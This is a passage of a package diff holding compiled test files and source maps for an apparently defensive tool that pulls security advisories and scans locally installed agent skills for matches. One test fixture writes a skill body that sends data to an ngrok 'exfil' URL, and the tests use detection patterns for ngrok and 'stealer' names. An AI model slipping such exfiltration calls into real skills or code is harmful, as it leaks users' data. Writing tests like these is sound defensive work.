lastRequest = { url: req.url, method: req.method, body: raw ? JSON.parse(raw) : undefined };
|
|
31
|
+
res.statusCode = nextResponse.status;
|
|
32
|
+
res.setHeader('content-type', 'application/json');
|
|
33
|
+
res.end(JSON.stringify(nextResponse.body));
|
|
34
|
+
});
|
|
35
|
+
baseUrl = started.url;
|
|
36
|
+
server = started.server;
|
|
37
|
+
});
|
|
38
|
+
(0, node_test_1.after)(() => {
|
|
39
|
+
server.close();
|
|
40
|
+
});
|
|
41
|
+
(0, node_test_1.it)('pullAdvisories returns advisories on 200', async () => {
|
|
42
|
+
nextResponse = {
|
|
43
|
+
status: 200,
|
|
44
|
+
body: {
|
|
45
|
+
success: true,
|
|
46
|
+
data: {
|
|
47
|
+
advisories: [
|
|
48
|
+
{
|
|
49
|
+
id: 'AGS-2026-1',
|
|
50
|
+
ecosystem: 'skill',
|
|
51
|
+
severity: 'high',
|
|
52
|
+
summary: 's',
|
|
53
|
+
detailsMd: '',
|
|
54
|
+
affected: [{ namePattern: 'foo' }],
|
|
55
|
+
publishedAt: '2026-05-13T00:00:00Z',
|
|
56
|
+
},
|
|
57
|
+
],
|
|
58
|
+
},
|
|
59
|
+
},
|
|
60
|
+
};
|
|
61
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
62
|
+
const result = await client.pullAdvisories('2026-05-12T00:00:00Z');
|
|
63
|
+
strict_1.default.equal(result?.length, 1);
|
|
64
|
+
strict_1.default.equal(result?.[0].id, 'AGS-2026-1');
|
|
65
|
+
strict_1.default.match(lastRequest.url, /\/api\/v1\/feed\/advisories\?since=/);
|
|
66
|
+
});
|
|
67
|
+
(0, node_test_1.it)('pullAdvisories returns null on 404 (older Cloud)', async () => {
|
|
68
|
+
nextResponse = { status: 404, body: { success: false, error: { message: 'Not found' } } };
|
|
69
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
70
|
+
const result = await client.pullAdvisories();
|
|
71
|
+
strict_1.default.equal(result, null);
|
|
72
|
+
});
|
|
73
|
+
(0, node_test_1.it)('pullAdvisories throws on other errors', async () => {
|
|
74
|
+
nextResponse = { status: 500, body: { success: false, error: { message: 'boom' } } };
|
|
75
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
76
|
+
await strict_1.default.rejects(() => client.pullAdvisories(), (err) => err instanceof client_js_1.CloudRequestError && err.status === 500);
|
|
77
|
+
});
|
|
78
|
+
(0, node_test_1.it)('reportSelfCheck POSTs the advisoryId + matches', async () => {
|
|
79
|
+
nextResponse = { status: 200, body: { success: true, data: {} } };
|
|
80
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
81
|
+
await client.reportSelfCheck('AGS-2026-1', [{ path: '/tmp/skills/bad', matchedBy: 'namePattern' }], { elapsedMs: 12 });
|
|
82
|
+
strict_1.default.equal(lastRequest.method, 'POST');
|
|
83
|
+
strict_1.default.match(lastRequest.url, /\/api\/v1\/feed\/self-check-report$/);
|
|
84
|
+
strict_1.default.equal(lastRequest.body.advisoryId, 'AGS-2026-1');
|
|
85
|
+
strict_1.default.equal(lastRequest.body.matches.length, 1);
|
|
86
|
+
});
|
|
87
|
+
(0, node_test_1.it)('reportSelfCheck swallows 404 silently', async () => {
|
|
88
|
+
nextResponse = { status: 404, body: { success: false, error: { message: 'no sink yet' } } };
|
|
89
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
90
|
+
await strict_1.default.doesNotReject(() => client.reportSelfCheck('AGS-x', [{ path: '/tmp/x', matchedBy: 'sha256' }]));
|
|
91
|
+
});
|
|
92
|
+
});
|
|
93
|
+
//# sourceMappingURL=feed-cloud.test.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"feed-cloud.test.js","sourceRoot":"","sources":["../../src/tests/feed-cloud.test.ts"],"names":[],"mappings":"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"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"feed-selfcheck.test.d.ts","sourceRoot":"","sources":["../../src/tests/feed-selfcheck.test.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1,118 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
var __importDefault = (this && this.__importDefault) || function (mod) {
|
|
3
|
+
return (mod && mod.__esModule) ? mod : { "default": mod };
|
|
4
|
+
};
|
|
5
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
6
|
+
const node_test_1 = require("node:test");
|
|
7
|
+
const strict_1 = __importDefault(require("node:assert/strict"));
|
|
8
|
+
const node_fs_1 = require("node:fs");
|
|
9
|
+
const node_os_1 = require("node:os");
|
|
10
|
+
const node_path_1 = require("node:path");
|
|
11
|
+
const node_crypto_1 = require("node:crypto");
|
|
12
|
+
const selfcheck_js_1 = require("../feed/selfcheck.js");
|
|
13
|
+
function makeSkillDir(parent, name, body) {
|
|
14
|
+
const dir = (0, node_path_1.join)(parent, name);
|
|
15
|
+
(0, node_fs_1.mkdirSync)(dir, { recursive: true });
|
|
16
|
+
(0, node_fs_1.writeFileSync)((0, node_path_1.join)(dir, 'SKILL.md'), body, 'utf8');
|
|
17
|
+
return dir;
|
|
18
|
+
}
|
|
19
|
+
function makeAdvisory(partial) {
|
|
20
|
+
return {
|
|
21
|
+
id: 'AGS-test-1',
|
|
22
|
+
ecosystem: 'skill',
|
|
23
|
+
severity: 'high',
|
|
24
|
+
summary: 'test',
|
|
25
|
+
detailsMd: '',
|
|
26
|
+
affected: [],
|
|
27
|
+
publishedAt: new Date().toISOString(),
|
|
28
|
+
...partial,
|
|
29
|
+
};
|
|
30
|
+
}
|
|
31
|
+
(0, node_test_1.describe)('feed/selfcheck', () => {
|
|
32
|
+
(0, node_test_1.it)('globMatch handles literal names', () => {
|
|
33
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook', 'slack-webhook'), true);
|
|
34
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook', 'discord-webhook'), false);
|
|
35
|
+
});
|
|
36
|
+
(0, node_test_1.it)('globMatch supports * wildcards', () => {
|
|
37
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook-*', 'slack-webhook-malicious'), true);
|
|
38
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook-*', 'slack-webhook'), false);
|
|
39
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('*-stealer-*', 'amos-stealer-v2'), true);
|
|
40
|
+
});
|
|
41
|
+
(0, node_test_1.it)('matches a skill by name pattern', async () => {
|
|
42
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
43
|
+
makeSkillDir(root, 'slack-webhook-evil', '---\nname: x\n---\nbody');
|
|
44
|
+
makeSkillDir(root, 'unrelated', '---\nname: y\n---\nbody');
|
|
45
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: 'slack-webhook-*' }] }), { skillRoots: [root] });
|
|
46
|
+
strict_1.default.equal(result.matchedArtifacts.length, 1);
|
|
47
|
+
strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'namePattern');
|
|
48
|
+
strict_1.default.match(result.matchedArtifacts[0].path, /slack-webhook-evil$/);
|
|
49
|
+
});
|
|
50
|
+
(0, node_test_1.it)('matches a skill by SKILL.md body regex', async () => {
|
|
51
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
52
|
+
makeSkillDir(root, 'innocent', '---\nname: ok\n---\nperfectly normal');
|
|
53
|
+
makeSkillDir(root, 'leaky', '---\nname: bad\n---\nfetch("https://abc.ngrok.app/exfil")');
|
|
54
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ bodyRegex: 'ngrok\\.app' }] }), { skillRoots: [root] });
|
|
55
|
+
strict_1.default.equal(result.matchedArtifacts.length, 1);
|
|
56
|
+
strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'bodyRegex');
|
|
57
|
+
});
|
|
58
|
+
(0, node_test_1.it)('returns no matches when nothing in the local env corresponds', async () => {
|
|
59
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
60
|
+
makeSkillDir(root, 'foo', '---\nname: foo\n---\n');
|
|
61
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: 'never-installed-*' }] }), { skillRoots: [root] });
|
|
62
|
+
strict_1.default.equal(result.matchedArtifacts.length, 0);
|
|
63
|
+
strict_1.default.deepEqual(result.warnings, []);
|
|
64
|
+
});
|
|
65
|
+
(0, node_test_1.it)('treats withdrawn advisories as no-op', async () => {
|
|
66
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
67
|
+
makeSkillDir(root, 'slack-webhook-evil', '---\nname: x\n---\n');
|
|
68
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({
|
|
69
|
+
affected: [{ namePattern: 'slack-webhook-*' }],
|
|
70
|
+
withdrawnAt: new Date().toISOString(),
|
|
71
|
+
}), { skillRoots: [root] });
|
|
72
|
+
strict_1.default.equal(result.matchedArtifacts.length, 0);
|
|
73
|
+
});
|
|
74
|
+
(0, node_test_1.it)('warns when the advisory targets an unsupported ecosystem', async () => {
|
|
75
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ ecosystem: 'mcp_server', affected: [{ namePattern: 'whatever' }] }), { skillRoots: [] });
|
|
76
|
+
strict_1.default.equal(result.matchedArtifacts.length, 0);
|
|
77
|
+
strict_1.default.ok(result.warnings.some((w) => w.includes('mcp_server')));
|
|
78
|
+
});
|
|
79
|
+
(0, node_test_1.it)('ignores roots that do not exist', async () => {
|
|
80
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: '*' }] }), { skillRoots: ['/definitely/not/a/real/path'] });
|
|
81
|
+
strict_1.default.equal(result.matchedArtifacts.length, 0);
|
|
82
|
+
strict_1.default.deepEqual(result.warnings, []);
|
|
83
|
+
});
|
|
84
|
+
(0, node_test_1.it)('matches sha256 against the SKILL.md content (canonical hash input)', async () => {
|
|
85
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
86
|
+
const body = '---\nname: rugpull\n---\nmalicious payload';
|
|
87
|
+
makeSkillDir(root, 'rugged', body);
|
|
88
|
+
const expected = (0, node_crypto_1.createHash)('sha256').update(body).digest('hex');
|
|
89
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ sha256: expected }] }), { skillRoots: [root] });
|
|
90
|
+
strict_1.default.equal(result.matchedArtifacts.length, 1);
|
|
91
|
+
strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'sha256');
|
|
92
|
+
strict_1.default.equal(result.matchedArtifacts[0].hash, expected);
|
|
93
|
+
});
|
|
94
|
+
});
|
|
95
|
+
(0, node_test_1.describe)('safeRegexTest', () => {
|
|
96
|
+
(0, node_test_1.it)('matches a normal pattern', () => {
|
|
97
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('ngrok\\.app', 'fetch https://x.ngrok.app/x'), true);
|
|
98
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('ngrok\\.app', 'no match here'), false);
|
|
99
|
+
});
|
|
100
|
+
(0, node_test_1.it)('rejects empty / non-string patterns', () => {
|
|
101
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('', 'anything'), false);
|
|
102
|
+
// @ts-expect-error — intentionally passing wrong type
|
|
103
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)(null, 'anything'), false);
|
|
104
|
+
});
|
|
105
|
+
(0, node_test_1.it)('rejects oversized patterns', () => {
|
|
106
|
+
const huge = '(' + 'a'.repeat(300) + ')';
|
|
107
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)(huge, 'aaaa'), false);
|
|
108
|
+
});
|
|
109
|
+
(0, node_test_1.it)('rejects nested-quantifier catastrophic patterns (ReDoS)', () => {
|
|
110
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(a+)+', 'aaaa'), false);
|
|
111
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(.+)+', 'xxxx'), false);
|
|
112
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(a*)*', 'aaaa'), false);
|
|
113
|
+
});
|
|
114
|
+
(0, node_test_1.it)('swallows compile errors silently', () => {
|
|
115
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(unclosed', 'aaaa'), false);
|
|
116
|
+
});
|
|
117
|
+
});
|
|
118
|
+
//# sourceMappingURL=feed-selfcheck.test.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"feed-selfcheck.test.js","sourceRoot":"","sources":["../../src/tests/feed-selfcheck.test.ts"],"names":[],"mappings":"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